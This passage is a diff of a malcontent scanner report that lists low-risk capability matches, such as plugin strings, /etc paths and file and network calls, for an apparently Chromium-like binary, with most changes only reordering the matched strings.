[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [getenv](https://github.com/search?q=getenv&type=code)
[LANG](https://github.com/search?q=LANG&type=code) | | LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | -| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Chromium PDF Plugin](https://github.com/search?q=Chromium+PDF+Plugin&type=code)
[ContainsPlugins](https://github.com/search?q=ContainsPlugins&type=code)
[Failed to generate a plugin id](https://github.com/search?q=Failed+to+generate+a+plugin+id&type=code)
[GetPluginInfo](https://github.com/search?q=GetPluginInfo&type=code)
[GetPlugins](https://github.com/search?q=GetPlugins&type=code)
[If you want to block plugins](https://github.com/search?q=If+you+want+to+block+plugins&type=code)
[Is an accelerated plugin](https://github.com/search?q=Is+an+accelerated+plugin&type=code)
[LoadPluginsSoon](https://github.com/search?q=LoadPluginsSoon&type=code)
[No PPP_GetInterface in plugin library](https://github.com/search?q=No+PPP_GetInterface+in+plugin+library&type=code)
[No PPP_InitializeModule in plugin library](https://github.com/search?q=No+PPP_InitializeModule+in+plugin+library&type=code)
[OnPepperPluginCrashed](https://github.com/search?q=OnPepperPluginCrashed&type=code)
[OnPepperPluginHung](https://github.com/search?q=OnPepperPluginHung&type=code)
[OpenChannelToPepperPlugin](https://github.com/search?q=OpenChannelToPepperPlugin&type=code)
[Pepper Plugin Broker](https://github.com/search?q=Pepper+Plugin+Broker&type=code)
[PepperPluginInstance](https://github.com/search?q=PepperPluginInstance&type=code)
[Plugin Changed](https://github.com/search?q=Plugin+Changed&type=code)
[Plugin URL](https://github.com/search?q=Plugin+URL&type=code)
[Plugin doesn](https://github.com/search?q=Plugin+doesn&type=code)
[PluginArray](https://github.com/search?q=PluginArray&type=code)
[PluginData](https://github.com/search?q=PluginData&type=code)
[PluginDispatcher](https://github.com/search?q=PluginDispatcher&type=code)
[PluginLoad](https://github.com/search?q=PluginLoad&type=code)
[PluginRegistry](https://github.com/search?q=PluginRegistry&type=code)
[PluginResource](https://github.com/search?q=PluginResource&type=code)
[PluginService](https://github.com/search?q=PluginService&type=code)
[PluginSizeUpdated](https://github.com/search?q=PluginSizeUpdated&type=code)
[PpapiMsg_LoadPlugin](https://github.com/search?q=PpapiMsg_LoadPlugin&type=code)
[PpapiPluginMain](https://github.com/search?q=PpapiPluginMain&type=code)
[PpapiPluginMetrics](https://github.com/search?q=PpapiPluginMetrics&type=code)
[RemoveBrowserPluginEmbedder](https://github.com/search?q=RemoveBrowserPluginEmbedder&type=code)
[SendToPlugin](https://github.com/search?q=SendToPlugin&type=code)
[SetBrowserPluginGuest](https://github.com/search?q=SetBrowserPluginGuest&type=code)
[The plugin has not](https://github.com/search?q=The+plugin+has+not&type=code)
[Unable to create ppapi plugin process](https://github.com/search?q=Unable+to+create+ppapi+plugin+process&type=code)
[Unable to load plugin](https://github.com/search?q=Unable+to+load+plugin&type=code)
[Unable to load ppapi plugin](https://github.com/search?q=Unable+to+load+ppapi+plugin&type=code)
[allowNonEmptyNavigatorPlugins](https://github.com/search?q=allowNonEmptyNavigatorPlugins&type=code)
[as a plugin](https://github.com/search?q=as+a+plugin&type=code)
[browserplugin](https://github.com/search?q=browserplugin&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[html_plugin_element](https://github.com/search?q=html_plugin_element&type=code)
[kPluginObject](https://github.com/search?q=kPluginObject&type=code)
[loadplugin](https://github.com/search?q=loadplugin&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[page contains plugins](https://github.com/search?q=page+contains+plugins&type=code)
[pdf_internal_plugin_wrapper](https://github.com/search?q=pdf_internal_plugin_wrapper&type=code)
[pdf_view_web_plugin](https://github.com/search?q=pdf_view_web_plugin&type=code)
[pepper_hung_plugin_filter](https://github.com/search?q=pepper_hung_plugin_filter&type=code)
[pepper_webplugin_impl](https://github.com/search?q=pepper_webplugin_impl&type=code)
[plugin data](https://github.com/search?q=plugin+data&type=code)
[pluginObject](https://github.com/search?q=pluginObject&type=code)
[plugin_audio_thread](https://github.com/search?q=plugin_audio_thread&type=code)
[plugin_container_impl](https://github.com/search?q=plugin_container_impl&type=code)
[plugin_instance_impl](https://github.com/search?q=plugin_instance_impl&type=code)
[plugin_message_filter](https://github.com/search?q=plugin_message_filter&type=code)
[plugin_module](https://github.com/search?q=plugin_module&type=code)
[plugin_process_host](https://github.com/search?q=plugin_process_host&type=code)
[plugin_service_impl](https://github.com/search?q=plugin_service_impl&type=code)
[pluginsEnabled](https://github.com/search?q=pluginsEnabled&type=code)
[pluginspace](https://github.com/search?q=pluginspace&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[pluginurl](https://github.com/search?q=pluginurl&type=code)
[ppapi_plugin_main](https://github.com/search?q=ppapi_plugin_main&type=code)
[ppapi_plugin_process](https://github.com/search?q=ppapi_plugin_process&type=code)
[r PluginH](https://github.com/search?q=r+PluginH&type=code)
[relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code)
[security origin than your plugin](https://github.com/search?q=security+origin+than+your+plugin&type=code)
[strictMixedContentCheckingForPlugin](https://github.com/search?q=strictMixedContentCheckingForPlugin&type=code)
[suggestplugin](https://github.com/search?q=suggestplugin&type=code) | +| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [No PPP_InitializeModule in plugin library](https://github.com/search?q=No+PPP_InitializeModule+in+plugin+library&type=code)
[relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code)
[No PPP_GetInterface in plugin library](https://github.com/search?q=No+PPP_GetInterface+in+plugin+library&type=code)
[Unable to create ppapi plugin process](https://github.com/search?q=Unable+to+create+ppapi+plugin+process&type=code)
[strictMixedContentCheckingForPlugin](https://github.com/search?q=strictMixedContentCheckingForPlugin&type=code)
[security origin than your plugin](https://github.com/search?q=security+origin+than+your+plugin&type=code)
[Failed to generate a plugin id](https://github.com/search?q=Failed+to+generate+a+plugin+id&type=code)
[allowNonEmptyNavigatorPlugins](https://github.com/search?q=allowNonEmptyNavigatorPlugins&type=code)
[If you want to block plugins](https://github.com/search?q=If+you+want+to+block+plugins&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[RemoveBrowserPluginEmbedder](https://github.com/search?q=RemoveBrowserPluginEmbedder&type=code)
[Unable to load ppapi plugin](https://github.com/search?q=Unable+to+load+ppapi+plugin&type=code)
[pdf_internal_plugin_wrapper](https://github.com/search?q=pdf_internal_plugin_wrapper&type=code)
[OpenChannelToPepperPlugin](https://github.com/search?q=OpenChannelToPepperPlugin&type=code)
[pepper_hung_plugin_filter](https://github.com/search?q=pepper_hung_plugin_filter&type=code)
[Is an accelerated plugin](https://github.com/search?q=Is+an+accelerated+plugin&type=code)
[OnPepperPluginCrashed](https://github.com/search?q=OnPepperPluginCrashed&type=code)
[SetBrowserPluginGuest](https://github.com/search?q=SetBrowserPluginGuest&type=code)
[Unable to load plugin](https://github.com/search?q=Unable+to+load+plugin&type=code)
[page contains plugins](https://github.com/search?q=page+contains+plugins&type=code)
[pepper_webplugin_impl](https://github.com/search?q=pepper_webplugin_impl&type=code)
[plugin_container_impl](https://github.com/search?q=plugin_container_impl&type=code)
[plugin_message_filter](https://github.com/search?q=plugin_message_filter&type=code)
[Pepper Plugin Broker](https://github.com/search?q=Pepper+Plugin+Broker&type=code)
[PepperPluginInstance](https://github.com/search?q=PepperPluginInstance&type=code)
[plugin_instance_impl](https://github.com/search?q=plugin_instance_impl&type=code)
[ppapi_plugin_process](https://github.com/search?q=ppapi_plugin_process&type=code)
[Chromium PDF Plugin](https://github.com/search?q=Chromium+PDF+Plugin&type=code)
[PpapiMsg_LoadPlugin](https://github.com/search?q=PpapiMsg_LoadPlugin&type=code)
[html_plugin_element](https://github.com/search?q=html_plugin_element&type=code)
[pdf_view_web_plugin](https://github.com/search?q=pdf_view_web_plugin&type=code)
[plugin_audio_thread](https://github.com/search?q=plugin_audio_thread&type=code)
[plugin_process_host](https://github.com/search?q=plugin_process_host&type=code)
[plugin_service_impl](https://github.com/search?q=plugin_service_impl&type=code)
[OnPepperPluginHung](https://github.com/search?q=OnPepperPluginHung&type=code)
[PpapiPluginMetrics](https://github.com/search?q=PpapiPluginMetrics&type=code)
[The plugin has not](https://github.com/search?q=The+plugin+has+not&type=code)
[PluginSizeUpdated](https://github.com/search?q=PluginSizeUpdated&type=code)
[ppapi_plugin_main](https://github.com/search?q=ppapi_plugin_main&type=code)
[PluginDispatcher](https://github.com/search?q=PluginDispatcher&type=code)
[ContainsPlugins](https://github.com/search?q=ContainsPlugins&type=code)
[LoadPluginsSoon](https://github.com/search?q=LoadPluginsSoon&type=code)
[PpapiPluginMain](https://github.com/search?q=PpapiPluginMain&type=code)
[Plugin Changed](https://github.com/search?q=Plugin+Changed&type=code)
[PluginRegistry](https://github.com/search?q=PluginRegistry&type=code)
[PluginResource](https://github.com/search?q=PluginResource&type=code)
[pluginsEnabled](https://github.com/search?q=pluginsEnabled&type=code)
[GetPluginInfo](https://github.com/search?q=GetPluginInfo&type=code)
[PluginService](https://github.com/search?q=PluginService&type=code)
[browserplugin](https://github.com/search?q=browserplugin&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[kPluginObject](https://github.com/search?q=kPluginObject&type=code)
[plugin_module](https://github.com/search?q=plugin_module&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[suggestplugin](https://github.com/search?q=suggestplugin&type=code)
[Plugin doesn](https://github.com/search?q=Plugin+doesn&type=code)
[SendToPlugin](https://github.com/search?q=SendToPlugin&type=code)
[pluginObject](https://github.com/search?q=pluginObject&type=code)
[PluginArray](https://github.com/search?q=PluginArray&type=code)
[as a plugin](https://github.com/search?q=as+a+plugin&type=code)
[plugin data](https://github.com/search?q=plugin+data&type=code)
[pluginspace](https://github.com/search?q=pluginspace&type=code)
[GetPlugins](https://github.com/search?q=GetPlugins&type=code)
[Plugin URL](https://github.com/search?q=Plugin+URL&type=code)
[PluginData](https://github.com/search?q=PluginData&type=code)
[PluginLoad](https://github.com/search?q=PluginLoad&type=code)
[loadplugin](https://github.com/search?q=loadplugin&type=code)
[pluginurl](https://github.com/search?q=pluginurl&type=code)
[r PluginH](https://github.com/search?q=r+PluginH&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [CreateDirectoryAndGetEr](https://github.com/search?q=CreateDirectoryAndGetEr&type=code)
[CreateDirectoryError](https://github.com/search?q=CreateDirectoryError&type=code)
[CreateDirectoryResult](https://github.com/search?q=CreateDirectoryResult&type=code)
[createFolder](https://github.com/search?q=createFolder&type=code)
[mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [CreateDirectoryAndGetEr](https://github.com/search?q=CreateDirectoryAndGetEr&type=code)
[CreateDirectoryResult](https://github.com/search?q=CreateDirectoryResult&type=code)
[CreateDirectoryError](https://github.com/search?q=CreateDirectoryError&type=code)
[createFolder](https://github.com/search?q=createFolder&type=code)
[mkdir](https://github.com/search?q=mkdir&type=code) | | LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | | LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | | LOW | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_force) | Forcibly deletes files | [rm HP-USB500 5.1 Headset](https://github.com/search?q=rm+HP-USB500+5.1+Headset&type=code)
[rm PA-WL54GU](https://github.com/search?q=rm+PA-WL54GU&type=code) | | LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open(](https://github.com/search?q=open%28&type=code) | | LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code) | | LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [MoveFile](https://github.com/search?q=MoveFile&type=code) | -| LOW | [fs/file/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-stat.yara#npm_stat) | access filesystem metadata | [fs.stat(base](https://github.com/search?q=fs.stat%28base&type=code)
[fs.statSync(file)](https://github.com/search?q=fs.statSync%28file%29&type=code) | +| LOW | [fs/file/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-stat.yara#npm_stat) | access filesystem metadata | [fs.statSync(file)](https://github.com/search?q=fs.statSync%28file%29&type=code)
[fs.stat(base](https://github.com/search?q=fs.stat%28base&type=code) | | LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [WriteFile](https://github.com/search?q=WriteFile&type=code)
[_writeFilesForTesting](https://github.com/search?q=_writeFilesForTesting&type=code)
[writeFileHandle](https://github.com/search?q=writeFileHandle&type=code)
[writeFileSync](https://github.com/search?q=writeFileSync&type=code)
[writeFileUtf8](https://github.com/search?q=writeFileUtf8&type=code)
[writeToFile](https://github.com/search?q=writeToFile&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [_writeFilesForTesting](https://github.com/search?q=_writeFilesForTesting&type=code)
[writeFileHandle](https://github.com/search?q=writeFileHandle&type=code)
[writeFileSync](https://github.com/search?q=writeFileSync&type=code)
[writeFileUtf8](https://github.com/search?q=writeFileUtf8&type=code)
[writeToFile](https://github.com/search?q=writeToFile&type=code)
[WriteFile](https://github.com/search?q=WriteFile&type=code) | | LOW | [fs/link_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-create.yara#linkat) | May create hard file links | [linkat](https://github.com/search?q=linkat&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | | LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/asound.conf](https://github.com/search?q=%2Fetc%2Fasound.conf&type=code)
[/etc/ati/amdpcsdb.default](https://github.com/search?q=%2Fetc%2Fati%2Famdpcsdb.default&type=code)
[/etc/catalog](https://github.com/search?q=%2Fetc%2Fcatalog&type=code)
[/etc/chromium/native-messaging-hosts](https://github.com/search?q=%2Fetc%2Fchromium%2Fnative-messaging-hosts&type=code)
[/etc/chromium/policies](https://github.com/search?q=%2Fetc%2Fchromium%2Fpolicies&type=code)
[/etc/drirc](https://github.com/search?q=%2Fetc%2Fdrirc&type=code)
[/etc/fonts/conf.d](https://github.com/search?q=%2Fetc%2Ffonts%2Fconf.d&type=code)
[/etc/gai.conf](https://github.com/search?q=%2Fetc%2Fgai.conf&type=code)
[/etc/group](https://github.com/search?q=%2Fetc%2Fgroup&type=code)
[/etc/host.conf](https://github.com/search?q=%2Fetc%2Fhost.conf&type=code)
[/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code)
[/etc/localtime](https://github.com/search?q=%2Fetc%2Flocaltime&type=code)
[/etc/machine-id](https://github.com/search?q=%2Fetc%2Fmachine-id&type=code)
[/etc/netsvc.conf](https://github.com/search?q=%2Fetc%2Fnetsvc.conf&type=code)
[/etc/nsswitch.conf](https://github.com/search?q=%2Fetc%2Fnsswitch.conf&type=code)
[/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code)
[/etc/pulse/](https://github.com/search?q=%2Fetc%2Fpulse%2F&type=code)
[/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code)
[/etc/ssl/cert.pem](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.pem&type=code)
[/etc/ssl/certs](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts&type=code)
[/etc/svc.conf](https://github.com/search?q=%2Fetc%2Fsvc.conf&type=code)
[/etc/timezone](https://github.com/search?q=%2Fetc%2Ftimezone&type=code)
[/etc/vulkan/icd.d](https://github.com/search?q=%2Fetc%2Fvulkan%2Ficd.d&type=code)
[/etc/xml/catalog](https://github.com/search?q=%2Fetc%2Fxml%2Fcatalog&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [mount](https://github.com/search?q=mount&type=code)
[-o](https://github.com/search?q=-o&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/chromium/native-messaging-hosts](https://github.com/search?q=%2Fetc%2Fchromium%2Fnative-messaging-hosts&type=code)
[/etc/ati/amdpcsdb.default](https://github.com/search?q=%2Fetc%2Fati%2Famdpcsdb.default&type=code)
[/etc/chromium/policies](https://github.com/search?q=%2Fetc%2Fchromium%2Fpolicies&type=code)
[/etc/nsswitch.conf](https://github.com/search?q=%2Fetc%2Fnsswitch.conf&type=code)
[/etc/fonts/conf.d](https://github.com/search?q=%2Fetc%2Ffonts%2Fconf.d&type=code)
[/etc/ssl/cert.pem](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.pem&type=code)
[/etc/vulkan/icd.d](https://github.com/search?q=%2Fetc%2Fvulkan%2Ficd.d&type=code)
[/etc/asound.conf](https://github.com/search?q=%2Fetc%2Fasound.conf&type=code)
[/etc/netsvc.conf](https://github.com/search?q=%2Fetc%2Fnetsvc.conf&type=code)
[/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code)
[/etc/xml/catalog](https://github.com/search?q=%2Fetc%2Fxml%2Fcatalog&type=code)
[/etc/machine-id](https://github.com/search?q=%2Fetc%2Fmachine-id&type=code)
[/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code)
[/etc/host.conf](https://github.com/search?q=%2Fetc%2Fhost.conf&type=code)
[/etc/localtime](https://github.com/search?q=%2Fetc%2Flocaltime&type=code)
[/etc/ssl/certs](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts&type=code)
[/etc/gai.conf](https://github.com/search?q=%2Fetc%2Fgai.conf&type=code)
[/etc/svc.conf](https://github.com/search?q=%2Fetc%2Fsvc.conf&type=code)
[/etc/timezone](https://github.com/search?q=%2Fetc%2Ftimezone&type=code)
[/etc/catalog](https://github.com/search?q=%2Fetc%2Fcatalog&type=code)
[/etc/pulse/](https://github.com/search?q=%2Fetc%2Fpulse%2F&type=code)
[/etc/drirc](https://github.com/search?q=%2Fetc%2Fdrirc&type=code)
[/etc/group](https://github.com/search?q=%2Fetc%2Fgroup&type=code)
[/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code) | | LOW | [fs/path/etc_resolv.conf](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-resolv.conf.yara#etc_resolv_conf) | accesses DNS resolver configuration | [/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code) | | LOW | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/privacy/](https://github.com/search?q=%2Fhome%2Fprivacy%2F&type=code) | | LOW | [fs/path/home_config](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home-config.yara#home_config_path) | path reference within ~/.config | [.config/pulse](https://github.com/search?q=.config%2Fpulse&type=code)
[/.config/user](https://github.com/search?q=%2F.config%2Fuser&type=code) | | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/cache/fontconfig](https://github.com/search?q=%2Fvar%2Fcache%2Ffontconfig&type=code)
[/var/run/user](https://github.com/search?q=%2Fvar%2Frun%2Fuser&type=code)
[/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | | LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TEMPDIR](https://github.com/search?q=TEMPDIR&type=code)
[TMPDIR](https://github.com/search?q=TMPDIR&type=code) | -| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [TEMP](https://github.com/search?q=TEMP&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[temp](https://github.com/search?q=temp&type=code) | +| LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [getenv](https://github.com/search?q=getenv&type=code)
[TEMP](https://github.com/search?q=TEMP&type=code)
[temp](https://github.com/search?q=temp&type=code) | | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [mkdtemp](https://github.com/search?q=mkdtemp&type=code)
[temp dir](https://github.com/search?q=temp+dir&type=code) | +| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [temp dir](https://github.com/search?q=temp+dir&type=code)
[mkdtemp](https://github.com/search?q=mkdtemp&type=code) | | LOW | [fs/tempfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile.yara#mktemp) | creates temporary files | [temp file](https://github.com/search?q=temp+file&type=code)
[tmpfile](https://github.com/search?q=tmpfile&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code)
[bssid](https://github.com/search?q=bssid&type=code) | @@ -165,7 +165,7 @@ | LOW | [net/http/auth](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth) | makes HTTP requests with Bearer authentication | [WWW-Authenticate](https://github.com/search?q=WWW-Authenticate&type=code)
[www-authenticate](https://github.com/search?q=www-authenticate&type=code) | | LOW | [net/http/oauth2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/oauth2.yara#oauth2) | supports OAuth2 | [oauth2](https://github.com/search?q=oauth2&type=code) | | LOW | [net/http/proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/proxy.yara#proxy_auth) | [use HTTP proxy that requires authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Proxy-Authorization) | [Proxy-Authorization](https://github.com/search?q=Proxy-Authorization&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code)
[http.get](https://github.com/search?q=http.get&type=code)
[httpClose](https://github.com/search?q=httpClose&type=code)
[httpConnect](https://github.com/search?q=httpConnect&type=code)
[httpRequest](https://github.com/search?q=httpRequest&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [httpConnect](https://github.com/search?q=httpConnect&type=code)
[httpRequest](https://github.com/search?q=httpRequest&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code)
[httpClose](https://github.com/search?q=httpClose&type=code)
[http.get](https://github.com/search?q=http.get&type=code)
[HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code) | | LOW | [net/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip.yara#packets) | access the internet | [invalid packet](https://github.com/search?q=invalid+packet&type=code) | | LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | | LOW | [net/ip/resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-resolve.yara#gethostbyaddr) | [resolves network hosts via IP address](https://linux.die.net/man/3/gethostbyaddr) | [gethostbyaddr](https://github.com/search?q=gethostbyaddr&type=code) | @@ -174,13 +174,13 @@ | LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | | LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [client_address_spac](https://github.com/search?q=client_address_spac&type=code)
[client_addresses_ca](https://github.com/search?q=client_addresses_ca&type=code)
[getpeername](https://github.com/search?q=getpeername&type=code) | | LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvfrom](https://github.com/search?q=recvfrom&type=code)
[recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [_send](https://github.com/search?q=_send&type=code)
[sendmmsg](https://github.com/search?q=sendmmsg&type=code)
[sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmmsg](https://github.com/search?q=sendmmsg&type=code)
[sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code)
[_send](https://github.com/search?q=_send&type=code) | | LOW | [net/url/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle) | Handles URL strings | [URLContext](https://github.com/search?q=URLContext&type=code)
[new URL](https://github.com/search?q=new+URL&type=code) | -| LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#get_env_val) | Retrieve environment variable values | [env.COLORTERM](https://github.com/search?q=env.COLORTERM&type=code)
[env.CRASHDUMP](https://github.com/search?q=env.CRASHDUMP&type=code)
